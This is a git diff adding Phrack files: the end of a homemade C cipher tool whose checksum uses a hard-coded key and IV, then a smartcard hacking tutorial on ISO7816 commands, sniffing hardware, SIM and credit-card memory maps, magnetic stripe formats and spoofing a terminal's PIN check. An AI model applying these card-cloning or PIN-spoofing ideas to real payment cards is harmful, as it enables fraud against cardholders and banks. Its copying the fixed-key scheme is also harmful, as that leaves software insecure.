+   * CBC mode uses padding, data->length / DPA_BLOCK_SIZE _MUST_ be even.
+   * Also, we got a block for the IV, at least a block for the data and
+   * a block for the padding information, this makes the size of cryptogram
+   * at least 3 * DPA_BLOCK_SIZE.
+   */
+  if ((data->length % DPA_BLOCK_SIZE) || data->length < (3 * DPA_BLOCK_SIZE))
+    exit(1);
+
+  /* Extract padding information by undoing block chaining on last block */
+  memcpy(block, data->data + data->length - DPA_BLOCK_SIZE, DPA_BLOCK_SIZE);
+  for (j = 15; j >= 0; --j)
+    D(key->subkey[j].key, block, key->subkey[j].shift);
+  xorptr = data->data + data->length - (DPA_BLOCK_SIZE * 2);
+  blockchain(block, xorptr);
+  padding = block[DPA_BLOCK_SIZE - 1];
+  cipher->length -= padding;
+
+  /* Extract Initialization vector */
+  memcpy(xblock, data->data, DPA_BLOCK_SIZE);
+  for (j = 15; j >= 0; --j)
+    D(key->subkey[j].key, xblock, key->subkey[j].shift);
+
+  cptr = cipher->data;
+  cnt = data->length - (DPA_BLOCK_SIZE * 2);
+  memset(block, 0, DPA_BLOCK_SIZE);
+  for (data->data += DPA_BLOCK_SIZE;
+       cnt >= DPA_BLOCK_SIZE;
+       cnt -= DPA_BLOCK_SIZE, data->data += DPA_BLOCK_SIZE,
+	 cptr += DPA_BLOCK_SIZE)
+    {
+      memcpy(block, data->data, DPA_BLOCK_SIZE);
+      memcpy(xblockprev, block, DPA_BLOCK_SIZE);
+      for (j = 15; j >= 0; --j)
+	D(key->subkey[j].key, block, key->subkey[j].shift);
+      blockchain(block, xblock);
+      if (cnt >= DPA_BLOCK_SIZE)
+	memcpy(cptr, block, DPA_BLOCK_SIZE);
+      else
+	memcpy(cptr, block, DPA_BLOCK_SIZE - (padding % DPA_BLOCK_SIZE));
+      memcpy(xblock, xblockprev, DPA_BLOCK_SIZE);
+    }
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* sum.c */
+/* NEEDS_FIX */
+/*
+ * This is basically a CBC encryption with a fixed IV and fixed key, the
+ * last block being the checksum. This needs a rewrite because there is
+ * no need to allocate memory for the whole ciphertext as only two blocks
+ * are needed.
+ */
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+#include "include/dpa.h"
+
+/* XXX - for better performances, unroll the loops ;) */
+void	DPA_sum(DPA_KEY *key, DPA_DATA *data, DPA_DATA *cipher)
+{
+  int	j;
+  int	cnt;
+  unsigned char	*cptr;
+  unsigned char	block[DPA_BLOCK_SIZE];
+  unsigned char	iv[DPA_BLOCK_SIZE];
+  unsigned char	xblock[DPA_BLOCK_SIZE];
+
+  /* Fixed key */
+  DPA_set_key(key, (unsigned char *)"deadbeef", 8);
+
+  /* Fixed IV */
+  memcpy(iv, "0123456789abcdef", DPA_BLOCK_SIZE);
+  memcpy(xblock, iv, DPA_BLOCK_SIZE);
+
+  cptr = cipher->data;
+  memcpy(xblock, iv, DPA_BLOCK_SIZE);
+  for (j = 0; j < 16; ++j)
+    E(key->subkey[j].key, iv, key->subkey[j].shift);
+  memcpy(cptr, iv, DPA_BLOCK_SIZE);
+  cptr += DPA_BLOCK_SIZE;
+  cnt = data->length;
+  memset(block, 0, 16);
+  for (; cnt > 0; data->data += DPA_BLOCK_SIZE, cptr += DPA_BLOCK_SIZE)
+    {
+      if (cnt < DPA_BLOCK_SIZE)
+	{
+	  memcpy(block, data->data, cnt);
+	  memset(block + cnt, 0, DPA_BLOCK_SIZE - cnt);
+	}
+      else
+	memcpy(block, data->data, DPA_BLOCK_SIZE);
+
+      blockchain(block, xblock);
+      for (j = 0; j < 16; ++j)
+	E(key->subkey[j].key, block, key->subkey[j].shift);
+      memcpy(xblock, block, DPA_BLOCK_SIZE);
+      memcpy(cptr, block, DPA_BLOCK_SIZE);
+      cnt -= DPA_BLOCK_SIZE;
+    }
+  memset(block, 0, DPA_BLOCK_SIZE);
+  if (data->length % DPA_BLOCK_SIZE)
+    block[DPA_BLOCK_SIZE - 1] = DPA_BLOCK_SIZE - data->length % DPA_BLOCK_SIZE;
+  blockchain(block, xblock);
+  for (j = 0; j < 16; ++j)
+    E(key->subkey[j].key, block, key->subkey[j].shift);
+  memcpy(cptr, block, DPA_BLOCK_SIZE);
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* usage.c */
+#include <stdio.h>
+#include <stdlib.h>
+#include <sysexits.h>
+#include <unistd.h>
+
+void	usage(void)
+{
+  fprintf(stderr, "usage: dpa -a action -m mode -k key -d data -o outfile\n");
+  fprintf(stderr, "       dpa -s filename\n");
+  fprintf(stderr, "\taction can be : encrypt, decrypt\n");
+  fprintf(stderr, "\tmode can be   : ecb, cbc\n");
+  fprintf(stderr, "\tkey can be    : \"key\" or file:/path/to/keyfile\n");
+  fprintf(stderr, "\tdata can be   : \"data\" or file:/path/to/datafile\n");
+  fprintf(stderr, "\toutfile can be: \"-\" (stdout) or a filename\n");
+  fprintf(stderr, "\twhen -s is used, a checksum of filename is computed\n");
+  exit (EX_USAGE);
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* main.c */
+#include <stdio.h>
+#include <string.h>
+#include <sysexits.h>
+#include <unistd.h>
+
+#include "include/dpa.h"
+
+int	main(int argc, char *argv[])
+{
+  int	kflag;
+  int	dflag;
+  int	sflag;
+  int	mflag;
+  int	aflag;
+  int	oflag;
+  int	opt;
+  int	mode;
+  int	action;
+  char	*output;
+  DPA_KEY	key;
+  DPA_DATA	data;
+  DPA_DATA	cipher;
+
+  mode = DPA_MODE_ECB;
+  action = DPA_ENCRYPT;
+  output = "-";
+  mflag = aflag = kflag = dflag = sflag = oflag = 0;
+  while ((opt = getopt(argc, argv, "a:m:k:d:o:s:")) != -1)
+    {
+      switch (opt)
+	{
+	case 'a':
+	  if (!strcmp(optarg, "enc") || !strcmp(optarg, "encrypt"))
+	    action = DPA_ENCRYPT;
+	  else if (!strcmp(optarg, "dec") || !strcmp(optarg, "decrypt"))
+	    action = DPA_DECRYPT;
+	  else
+	    {
+	      fprintf(stderr, "unknown action, expected encrypt or decrypt\n");
+	      return (EX_USAGE);
+	    }
+	  aflag = 1;
+	  break;
+
+	case 'm':
+	  if (!strcmp(optarg, "ecb"))
+	    mode = DPA_MODE_ECB;
+	  else if (!strcmp(optarg, "cbc"))
+	    mode = DPA_MODE_CBC;
+	  else
+	    {
+	      fprintf(stderr, "unknown mode, expected ecb or cbc\n");
+	      return (EX_USAGE);
+	    }
+	  mflag = 1;
+	  break;
+
+	case 'k':
+	  if (strncmp(optarg, "file:", 5) || strlen(optarg) == 5)
+	    DPA_set_key(&key, (unsigned char *)optarg, strlen(optarg));
+	  else
+	    DPA_set_keyfile(&key, optarg + 5);
+	  kflag = 1;
+	  break;
+
+	case 'd':
+	  if (strncmp(optarg, "file:", 5) || strlen(optarg) == 5)
+	    DPA_set_data(&data, (unsigned char *)optarg, strlen(optarg));
+	  else
+	    DPA_set_datafile(&data, optarg + 5);
+	  dflag = 1;
+	  break;
+
+	case 'o':
+	  output = optarg;
+	  oflag = 1;
+	  break;
+
+	case 's':
+	  DPA_set_datafile(&data, optarg);
+	  sflag = 1;
+	  break;
+
+	default:
+	  usage();
+	}
+    }
+
+  if ((!aflag || !mflag || !kflag || !dflag) && !sflag)
+    usage();
+
+  if (sflag)
+    {
+      DPA_set_ciphertext(&data, &cipher, DPA_MODE_CBC, DPA_ENCRYPT);
+      DPA_sum(&key, &data, &cipher);
+      DPA_sum_write_to_file(&cipher, output);
+    }
+  else
+    {
+      DPA_set_ciphertext(&data, &cipher, mode, action);
+      if (action == DPA_ENCRYPT)
+	{
+	  if (mode == DPA_MODE_ECB)
+	    DPA_ecb_encrypt(&key, &data, &cipher);
+	  else if (mode == DPA_MODE_CBC)
+	    DPA_cbc_encrypt(&key, &data, &cipher);
+	}
+      else if (action == DPA_DECRYPT)
+	{
+	  if (mode == DPA_MODE_ECB)
+	    DPA_ecb_decrypt(&key, &data, &cipher);
+	  else if (mode == DPA_MODE_CBC)
+	    DPA_cbc_decrypt(&key, &data, &cipher);
+	}
+      DPA_write_to_file(&cipher, output);
+    }
+  return (EX_OK);
+}
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
+
diff --git a/phrack62/15.txt b/phrack62/15.txt
new file mode 100644
index 0000000..085f1ba
--- /dev/null
+++ b/phrack62/15.txt
@@ -0,0 +1,893 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3e, Phile #0x0f of 0x10
+
+|=--------=[ Introduction for Playing Cards for Smart Profits ]=--------=|
+|=----------------------------------------------------------------------=|
+|=------------------=[ ender <ender@afturgurluk.org> ]=-----------------=|
+
+--=[ Contents ]=----------------------------------------------------------
+
+	1 - Introduction 
+	2 - Dealing with ISO7816 standard 
+		2.1 - Receiving Answer To Reset 
+		2.2 - Sending commands
+		2.3 - Receiving answers 
+		2.4 - For example
+        2.5 - Your Rights
+
+	3 - SmartCard Man in the middle
+	4 - BruteForcing unidenfitied cards
+	5 - Examples of mapping and filesystem
+		5.1 - Mapping of old french Credit cards
+		5.2 - File System of SIM Cards
+
+	6 - Cyphering with smartcards 
+	7 - Magnetic stripe 
+		7.1 - ISO 
+		7.2 - ALPHANUMERIC 
+		7.3 - BINARY
+
+	8 - Synchronous smartcards
+	9 - Programming a card for ISO7816 purposes
+	10 - Conclusion 
+	11 - Greetings
+	12 - Bibliography 	
+
+    Appendix A: Communication log 
+
+--[ 1 - Introduction ]-----------------------------------------------------
+
+	All what is written in this article must be used for cracking cards 
+and shouldn't be used to secure already existing application. However, 
+the aim of this article is to show you how to engage the dialog with 
+your smartcards (very useful when you don't have a girlfriend to talk 
+with), and not the way to use already cracked cards.
+
+What you need for studying card is : 
+    - THE standard : ISO7816
+        ( http://www.cardwerk.com/smartcards/smartcard_standards.aspx )
+        
+    - a smartcard reader (Phoenix)
+
+    - optionally a Reader/Writter for magnetic stripes (just for fun).
+        
+    - maybe a Season -I will explain later-, 
+        
+    - some bank cards,
+      
+    - and a computer:
+       - Under Linux/Unix : you can check for shcap 
+         (www.afturgurluk.org/~ender/)
+         or try SmartCard ToolKit
+         (http://freshmeat.net/projects/sctk/ )
+       - Under bill's non-operating system : WinExplorer from Dexter 
+         (www.geocities.com/Winexplorer/)
+        
+
+--[ 2 - Dealing with ISO7816 standard ]------------------------------------
+
+    You will need to refer to this standard. Here we will see how to engage
+the communication with a smartcard plugged in your phoenix (smartcard 
+reader), which is plugged in your rs232 port. I have put two examples with :
+a credit card, and a SIM card. If no specific card is mentionned in the 
+presentation of the protocol, it means that the information is valid for all
+7816 ISO compliant cards.
+	
+----[ 2.1 - Receiving Answer To Reset (ATR) ]------------------------------
+
+	First, you will need to reset the card (with an ioctl, or directly 
+typing 'reset' in a smartcard shell) to boot the card, then it sends a data 
+buffer to identify itself, and to explicit its specifications such as the 
+frequency, the programming voltage, the GuardTime the Convention 
+(inverse/direct)... What is really useful to know is :
+
+The ATR looks like that :
+ATR : TS T0 TA1 TB1 TC1 TD1 TA2 ... TDn Tk TCK
+
+    TS  : 3B  Direct Convention
+          3F  Inverse Convention
+
+    T0  : gives the number of Historical Bytes (specific to the card)
+
+    TD  : gives the protocol (mostly T=0 send Word, T=1 send Characters)
+
+    Tk  : The k Historical Bytes... not really verbose in fact :/
+
+    TCK : Just a checksum to verify you have a good ATR...
+
+Nota : If you don't receive 0x3B or 0x3F for TS, maybe you must reconfigure
+your soft to receive Byte in another convention...
+
+----[ 2.2 - Sending commands ]---------------------------------------------
+	
+	The instructions are send to the card via a serial link. The protocol 
+is explained in the standard but is mereley like an I2C without scl. The 
+packets are composed with five parts :
+	
+	CLA : 1 Byte. ISO Class. e.g. :
+BC = french credit cards, 
+A0 = SIM cards, 
+00 = Moneo/Open cards...
+	
+	INS : 1 Byte. Instruction. e.g.:
+20 = PIN verification, 
+B0 = Read 
+B2 = Read record
+D0 = Write
+DC = Write record
+A4 = Select directory
+8x = Encryption with key 'x', the algorithms depends on the card, 
+C0 = Get answer...
+	
+	P1, P2 : 2 Bytes. Parameters, mostly it's an address to read/write. 
+        
+	LEN : 1 Byte. Length expected for the answer or lenght of the argument
+	
+	ARG : LEN Byte. Argument you give for the instruction (bytes to write,
+          data to cypher, PIN to verify...), sometimes, the card must answer 
+          a byte of aknowledgement -depending on the instruction- between 
+          each bytes in the argument buffer.
+
+----[ 2.3 - Receiving answers ]-------------------------------------------- 
+
+    To aknowledge to a command, the card send the instruction byte back to 
+the terminal, then a length of datas equal to the parameter LEN of the 
+command, and finish with SW1, SW2. ( 0x90 0x00 when the operation was 
+succesful ). If the operation wasn't successful, then only SW1 and SW2 are 
+sent, with a specific error code :
+
+	0x6E 0x00	CLA error
+	0x6D 0x00	INS error
+	0x6B 0x00	P1, P2 error
+	0x67 0x00	LEN error
+	0x98 0x04	Bad PIN
+	0x98 0x08	Unauthorized Access
+	0x98 0x40	Card blocked
+	...
+
+
+----[ 2.4 - For example ]-------------------------------------------------- 
+
+Here are some examples taken from shcap. You can download it from 
+<http://www.afturgurluk.org/~ender/shcap.tgz> .
+But you can do the same with 7816shell <http://freshmeat.net/projects/sctk/>
+
+If you use Shcap :
+oops:~/7816/shcap_rel$ sudo ./shcap 
+
+Terminal> help
+Shcap v0.0.9 by ender <ender@afturgurluk.org>
+
+connect                 - Connect to the Serial port given with -D parameter
+XX .. XX                - Send XX .. XX to the card
+log                     - Log comm between card and terminal (need a season)
+bf                      - Try to find ISO CLA byte of the card
+reset                   - Reset the card
+direct                  - Set direct convention
+inverse                 - Set inverse convention
+cd XX XX                - Select directory XX XX
+cat XX XX               - Read rd_len bytes at address XX XX
+readrec XX              - Read rd_len on record XX of current file
+get N                   - Get N bytes of the answer
+login                   - Verify PIN given
+cypher XX .. XX         - Cypher 8 Bytes
+set                     - Set parameter :
+                           cla=XX    Set the iso class to XX (default 00)
+                           key=X     Set the cyphering key to X (default 0)
+                           rd_len=N  Set the read lenght to N (default 8)
+					       timeout=N Set the poll timeout to Nms (default 500ms)
+help                    - Display this help
+quit                    - Exit the shell
+
+  ###### Example with a Bull CP8 mask 4 BO' (french credit card) ######
+Terminal> connect
+
+Reset for a B4/B0' :
+ATR: 3F 65 25 08 93 04 6C 90 00
+
+Analysing the ATR :
+3F -  Convention inverse
+6  -  TB and TC sent (if TD is not sent, the protocol is 0 : send words)
+5  -  5 historical Bytes
+25 -  TB : Programming current : max 50mA - Programming Voltage 5V
+08 -  TC : GuardTime : 8 * 1/9600Hz = 833us
+
+Historical Bytes
+93 04 6C 90 00  --Note that the 90 00 change to 90 10 after a first 
+                  wrong PIN code
+
+
+Reading Constructor Area of a B4/B0' :
+Terminal> set cla=bc
+ISO CLASS set to BC
+
+Terminal> set rd_len=8
+READ LENGHT set to 8
+
+Terminal> cat 09 C0          
+               --Read at $09C0 8 bytes
+Card> B0 19 DF 64 08 1F F4 0F B0 90 00  
+
+Analysing Constructor Area :
+19 DF 64 08 : Card Serial Number 
+1FF4 / 0FB0 : Free Read area : $07F8 / Access Control : $03E8
+90 00       : ok
+                                          
+  
+Signing Data with salt in [07E8] :
+Terminal> set key=0                         --Cipher 8 Bytes with K0 
+KEY set to 0
+
+Terminal> cypherCB 09 11 15 04 16 00 07 E8  --ARG=09 11 15 04 16 00 [07 E8]
+Card> 90 00                                 --Instruction ok
+
+Getting response :
+Terminal> get 8                             --Get answer 8 bytes
+Card> C0 12 4F 54 A3 64 C5 2B 07 90 00      --12 4F 54 A3 64 C5 2B 07 ok
+
+             ##### Example with a SIM card for GSM #####
+Terminal> set cla=a0
+ISO CLASS set to A0
+
+Verifying PIN 12345678 on a SIM :
+Terminal> login                             --Check PIN 8 Bytes
+Enter your PIN code : 12345678              --The PIN is encoded in ASCII
+Card> 90 00                                 --PIN ok
+
+Selecting /TELE
+COM/SMS/ directory in a SIM :
+Terminal> cd 7f 10                          --Select TELECOM dir : 7F 10
+Card> 9F 16 		                        --Dir description, 20Bytes
+Terminal> cd 6f 3c                          --Select SMS subdir : 6F 3C
+Card> 9F 0F		                            --Dir description, 15Bytes
+
+Reading msg (15 Bytes) :
+Terminal> get 15                            --Get 15 Bytes
+Card> C0 00 00 ** ** 6F 3C ** ** ** ** ** ** ** ** ** 90 00
+
+Reading the 3rd SMS of current file :
+Terminal> set rd_len=176
+READ LENGHT set to 176
+
+Terminal> redrec 3                          --Read record 3, 176Bytes
+Card> B2 00 FF .. FF 90 00	                --status = 00, data=0xff..ff
+Terminal> quit
+
+Well. That's all for the examples...not really dificult, isn't it ?
+
+
+--[ 2.5 - Your Rights ]----------------------------------------------------
+
+    SmartCards use some kind of filesystems, so there are some rights (xrw)
+for the different areas are files. The right to execute is obviously for 
+instructions only... 
+Generally, for a single-provider card, there are three levels :
+
+    -Nobody, when you boot the card you are not yet identified...
+    -Owner, you are "logged in" when you enter your PIN
+    -Provider, there is another code named PUK you can't know. It is 
+     used for example when you stupidly block your card, to reset the 
+     blocking mechanism. 
+
+    In a SIM card (at least, the SIM card I have worked on), you cannot 
+read or write if you didn't login. When you enter (the instruction name is 
+verify) the PIN, then you can read, and even write in some files (mostly 
+in TELECOM directory, containing your SMS, your dialing numbers, etc.).
+    In credit cards, which are divided in areas, you need the PIN just to
+read/write your Transaction Bulletin (at least for french ones... It is also
+a major security hole if the PIN is not verifyed dynamically by the bank).
+
+
+--[ 3 - SmartCard Man in the middle ]--------------------------------------
+
+	Something which is very useful for studying smartcards is a Season :
+	
+      
+             _____________                 __________
+             |           |--  6            |--      |
+             | Terminal  | |--/------------| Card   |
+             |___________|--         |     |________|
+                                     |
+                                     / 3                        Display ;)
+                                  ___|____                     ____________
+                                 | Season |      3             | logging: | 
+                                 |________|------/-----RS232-->| 3F 16 15 |
+                                                               |__________|
+
+
+    You need to connect 6 wires from your smartcard to a Wafer, but only 3
+to your computer. If you have read the standard, you now that there is only 
+one pin dedicated to the Input/Output. You also need to connect the ground 
+(useful to have a reference...) and the Reset pin in order to start logging 
+when the card boots. It will permit you to log the dialog between the 
+terminal and the smartcard. This the most common way to analyse a smartcard 
+when you have an access to the terminal, but you might want to study the 
+terminal with a logic analyser awfuly expensive and reverse the results on 
+the screen of your oscilloscope (might sound very silly, but someone did 
+that :p). If for some reasons you don't have any physical access to the 
+terminal, report to next part.
+The scheme for a season is quite simple, you can add some LEDs to see what 
+is going on. The MAX232 is here to convert the 5V from the card pins to 
+the 12V of the RS232 link of your computer (or laptop ;).
+
+
+                                 +-------------------------+
+                                 |                         |
+   +-----------------------------|-+     LED 3mm  R1 250ohm|
+   |                    1 _   _16| |     ____|/|___/\/\/\__+
+   |                    -| |_| |-+ |     |   |\|           | 
+   | +---------------+  -|  M  |---|-----+                 |  Connector ISO
+ 1 | |               |  -|  A  |---+   __|__               |              
+ __|_|_______ 5      |  -|  X  |-      /////             1 |______ 5
+ | | | . . ._______  |  -|  2  |-                         /+_|  __+-------+
+  \ . . . . /     |  |  -|  3  |---------------------------+_|  |___|     |
+ 6 \_______/ 9    |  +---|  2  |-----------------+       |___|__|_+----+  |
+     DB9          |     -|_____|-                |      4 \__|__|__/ 8 |  |
+                  |     8       9                +---------------------+  |
+                  |                                                       |
+                  +-------------------------------------------------------+
+                __|__
+                /////
+                               Scheme for a season
+                     
+ISO Pins                        DB9 Pins
+1. Vcc   5. Gnd             1   2   3   4   5
+2. Rst   6. Nc             DCD RxD TxD     GND
+3. Clk   7. I/O               6   7   8   9
+4. Nc    8. Nc
+                  
+Don't forget to add 4 x 0.1uF between pins 2-16, 15-6, 1-3 and 4-5 of the 
+MAX232. You can refer to the MAX232 datasheet for more details (ascii scheme 
+are not that clear...)
+  
+	Now you have to log the data, just write somewhere on your hard drive 
+the datas sent and received by the card. You can try this with the 'log' 
+command in shcap, or with the program 7816logger from sctk.
+
+The real problem is to analyse these datas. 
+
+    * Firstly, the card send an ATR (which stand for Answer To Reset). 
+
+    * Now that the terminal know the identity of the card, it can send 
+    instructions composed firstly of 5 bytes. 
+    * Then the card repeat the code of the instruction and the terminal can 
+    send the argument buffer if it is not empty, then the card can answer, 
+    * et caetera... 
+
+You can try to search the ISO class (sent just after the ATR) and try to
+indent your log with just this information, and the knowledge of the 
+"protocol" as explained earlier...
+
+    After that, you should be able to recreate the behaviour expected by the 
+terminal, excepted for the cryptographic instructions... but this is another 
+problem. You have surely heard of S/DPA (Single/Differential Power Analysis), 
+DFA (Differential Fault Attack) or Time Attack which are the current means for
+retrieving "easily" the keys stored inside cards. But this is not our topic.
+
+    Obviously, if you want to make an attack against a terminal with such a
+system, you can : by overriding the real card, recording what the card 
+must answer, and processing the answer before replaying. The processing could
+be used, for example, to make the terminal believe the PIN you entered was the 
+good one (because you are evil and you are trying a card which is not yours),
+by putting the card in standby and reproducing the behaviour of the card as
+if the PIN was really the good one... 
+It only works if the authentification system of the smartcard doesn't need 
+the PIN for generating the certificate, which is not really common.
+Well, if you can reproduce the authentification, it is not necessary to do 
+such an attack, because you can get rid of the original card, but it is not 
+an easy way ;)
+
+You can find at the end of the article an exemple of a communication between
+a credit card and a terminal. The datas inside the cards are not always 
+obvious to guess. Generally, you can hope to find an official documentation
+somewhere, or try to see the changes that happen between each use of the 
+card.
+
+
+--[ 4 - BruteForcing unidenfitied cards ]----------------------------------
+
+	When you don't know the ISO class of the card you want to play with, 
+you can bruteforce the iso class. It is not very dificult if your computer 
+is able to count from 0x00 to 0xFF.
+By retrieving the error codes from the card, you know the class is the good
+one because the card send you an INS Error (6D 00), instead of a CLA error
+(6E 00).
+
+	So you've got it. And instructions are public, so I put some 
+examples upper, and others are in the ISO7816, and on the Internet...
+<http://www.cardwerk.com/smartcards/smartcard_standard_ISO7816-4.aspx>
+<http://www.cardwerk.com/smartcards/
+smartcard_standard_ISO7816-4_6_basic_interindustry_commands.aspx>
+
+    To guess the architecture of a card is a different matter. Always try the 
+instruction 0xB0 to see if you can read some addresses, and you'll can 
+interpret the error messages if you cannot read. If the smartcard has got 
+a filesystem, you can verify it with selecting (ins 0xA4) the root directory 
+0x3F00, and see what is going on. Get the response to see if there are some 
+other directories. 
+As you know the error code for a P1 P2 wrong (bad address) you also can try to 
+evaluate the capacity of the card: 8ko ? 64 ko ?. It works only if there is no 
+filesystem, like in credit cards... See for examples down here :
+
+
+--[ 5 - Examples of mapping and filesystem ]-------------------------------
+
+----[ 5.1 - Mapping of old french Credit cards ]---------------------------
+
+Bull CP8 mask B0-B0'
+
+      _____________________
+$1000 | Constructor area  |
+      |___________________|
+$09C0 |                   |
+      |    FREE READ      |
+      |___________________|
+$07F8 |    Transaction    |
+      |      Bulletin     |
+      |___________________|
+$03E8 |  ACCESS COUNTER   |
+      |___________________|
+$02B0 |  SECRET AREA      |
+      |___________________|
+$0200 |       N/A         |     
+      |___________________|
+$0000
+
+
+----[ 5.2 - File System of SIM Cards ]-------------------------------------
+
+--GSM SIMcard
+
+3F00 ROOT dir
+  |
+   \__2FE2 Card serial Number
+
+7F10 TELECOM
+  |
+  |\__6F3A Directory
+  |\__6F3B Fixed directory
+  |\__6F3C SMS
+  |\__6F40 Last calls
+  |\__6F42 SMS pointer
+  |\__6F43 SMS status
+  |\__6F44 Dialing numbers
+  |\__6F4A Extension 1
+   \__6F4B Extension 2
+
+7F20 GSM
+  |
+  |\__6F05 Language
+  |\__6F07 IMSI
+  |\__6F20 Cyphering Key
+  |\__6F30 Provider selector
+  |\__6F31 Search Period
+  |\__6F37 Account Max
+  |\__6F38 Sim Service Table
+  |\__6F39 Cumulated calls
+  |\__6F3D Capability Config Param 
+  |\__6F3E Group ID 1
+  |\__6F3F Group ID 2
+  |\__6F41 Price per unit
+  |\__6F45 Cell Broadcast msg ID
+  |\__6F74 Broadcast Control Chan
+  |\__6F78 Access Control Class
+  |\__6F7B Providers Forbidden
+  |\__6F7E Location Info
+  |\__6FAD Admin data
+   \__6FAE Phase ID
+
+Then, you can log the communication between your SIM card and your 
+mobile phone if you want more information ;)
+	
+--[ 6 - Cyphering with smartcards ]----------------------------------------
+
+	All smartcards can cypher or generate a certificate to authenticate 
+itself to a terminal or a provider. Mostly the instructions 0x80 to 0x8F are 
+used to do it. To get the answer, just ask for it with the 0xC0 instruction.
+	Open cards are made particularly to such things. Open means you can 
+find all the documentation you want about it on the Internet 
+(www.opensc.org), so I won't stay on it...
+    The encryption system in smartcards is mostly to authenticate the card.
+But all its security do not depends only on the cryptographic mechanisms 
+inside the card. The protocol is generally the weak part of the 
+authentication...
+
+--[ 7 - Magnetic stripe ]--------------------------------------------------
+	
+	Magnetic stripes on smartcards are very common. As this is a completely 
+passive way of authentification, it can easily be cloned. However, it also 
+means that all the difficulty is in the interpretation of the data contained 
+in the stripes and the understanding of the algorithms for cyphering 
+discretionnary data in the case you might want to generate your own card, 
+or just change some information.
+You will need for this part of a magnetic stripe reader. It is quite expensive
+but it is also possible to make its own driver and do it with just a tape 
+recorder. You can try cmread http://www.afutgurluk.org/~ender/cmread.tgz
+for a driver on LPT1.
+
+    Depending on your software and hardware, you will have more or less easily
+these informations : the density of encoding, and the number of bits per 
+character. For the number of bits per character, if you have read with the good 
+number of bits without errors, then you have to check the parity bits. Normally, 
+the soft you used to read the stripe is able to to do such a thing, other wise 
+the method consist in :
+	- Take the first bit equal to 1
+	- Check the parity on the first 5 bit
+	- If it is not OK, then try with 6,7,8 or 9 
+	- Try on the next pack of [5,6,7,8,9] till the end.
+	- Check the LRC
+
+There are two ways for detecting error, the first is with the parity bits, the
+second is the LRC for Longitudinal Redondancy Check. The character of the track
+is equal to the XOR of all characters. 
+
+There are 3 different cases easily recognizable :
+
+----[ 7.1 - ISO ]----------------------------------------------------------
+	
+	ISO-1 (210 bpi - 7 bits) : The stripe is divided in several parts :
+
+- '%' Start sentinel 
+- 'B' Format code
+- Primary account number (your account number on your credit card for example)
+- '^'  Field separator
+- Name of the owner
+- Field separator
+- Expiration date (4 BCD numbers)
+- Service Code (101 for VISA, ...)
+- Discretionnary data 
+- '?' End Sentinel 
+- LRC 
+
+Example :
+% B 0123456789012345 ^ MR SMITH JOHN       ^ 9910 101 
+123456789000000123000000 ?
+
+It is not compulsory exactly like that, but it cannot differ a lot. 
+	
+	ISO-2/3 (75 bpi - 5 bits):
+
+- ';' Start Sentinel 
+- Primary Account Number
+- '=' Field separator 
+- Expiration date	
+- Service code
+- Discretionnary data
+-
+ '?' End Sentinel 
+- LRC
+
+Example:
+; 01236789012345 = 9910 101 123456789000000123 ?
+
+Note that the PAN (Primary Account Number) must verify the Lhun Algorithm.
+
+	The standard is ISO-7811 if you want more information...
+
+----[ 7.2 - ALPHANUMERIC ]-------------------------------------------------
+
+	It is quite like ISO, but a bit less verbose. You just have the same
+Start sentinel depending on the number of the track (1 : '%', 2 & 3 : ';'), 
+the same Field Separators, and End Sentinel. Between Start and End Sentinels, 
+you have data coded in BCD or ALPHA separated by the field separator of the 
+track related.	
+
+----[ 7.3 - BINARY ]-------------------------------------------------------
+ 
+	Keep in mind that there is not necessarily a structure like that. 
+Sometimes bit are put in desorder, as if the designer of the stripe was 
+completly drunk and was playing dice with friends to know what to do...
+Just use your card and try to understand what has changed.
+
+--[ 8 - Synchronous smartcards ]-------------------------------------------
+
+	I just put this part in order to do a complete tour on smartcards. This 
+type of card is very lame, They have a poor capacity (less than 1kb in 
+general), they don't always respect ISO standard for pins. What is sure is 
+that you have 2 pins for Vcc and the ground, 1 pin for the Clock, 1 pin for 
+the reset, 1 pin for the I/O, and sometimes 1 pin for the Vpp (programming 
+voltage) and 1 pin for the Write Enabled.
+	They don't have an ATR. They just react on negative edges of the Clock 
+pin by sending the next bit (or first if it is reseted) in its memory on the 
+I/O pin. If you can write, you will need a different voltage put on the Vpp 
+pin (up to 21V) and enable the Write pin. Generaly, you just can set a bit 
+from 1 to 0 beacuse of the OTP (One Time Programmable) technology used 
+inside (you just flash a fuse in the chip).
+	French telephone cards use such a technology (Merci, France TeleCom.) ;)
+
+--[ 9 - Programming a card for ISO7816 purposes ]--------------------------
+
+	If you can read this line, it is because Phrack has accepted my 
+article without asking me to paste some of my codes to write a bloody 
+tutorial to code your own smartcard emulator using a pic from microchip 
+(www.microchip.com) and then you will need to think by yourself if you are 
+interested in how to write such programs (it is not very obvious...). As I 
+am nice and gentle, I give you the most common architecture :
+
+	- Send the ATR (On each reset it will restart here)
+	- Wait for the first Byte (ISO class) and verify it is the right one
+	- Receive the second byte and compare it with each byte INS you have 
+	implemented, other wise send an error.
+	- Jump to the part of code written for the INS asked for and process the
+	arguments
+	- Then you have 2 choices  (The Hacker's Choice is the best :p) :
+		* use an eeprom to save all your datas, and then read and write 
+		it in order to complete the instrion asked for by the terminal
+		* use the PIC flash, by writting a list of RETLW 0xXX, determine
+		the offset of the Byte nee
+ded and then just add this offset to 
+		the current Program Counter.
+
+	Some advises :
+
+    - ISO 7816-3 is your friend ;)
+	- Never forget the parity bit to send datas, and also the ACK (or NACK) 
+	when you receive
+	- Wait for a ACK from the terminal, if it is a NACK, just send again, 
+	and it will works
+	- Write your own code, it will avoid you from silly bugs you don't 
+	understand that could lead you in prison in case of problem (big brother
+	is always watching you, you cannot be wrong...)
+	- Don't do too nasty things, work only on an emulated terminal on your 
+	computer :p
+    - Google is your friend to find URL for programming PIC-based smartcards
+	
+--[ 10 - Conclusion ]-----------------------------------------------------
+
+	No need to work in a laboratory to play with smartcards security at 
+an interesting level. Don't believe that S/DPA, or DFA is the only way
+to study cards. Some of the articles on such methods are written by people 
+who has never seen a glitch generator in their whole life...
+Eventually you just need an old 486 and a soldering iron to find security
+holes in smartcard protocols and then buy some food with emulated credit 
+cards, phone friends with a self made SIM card watching numeric tv with a 
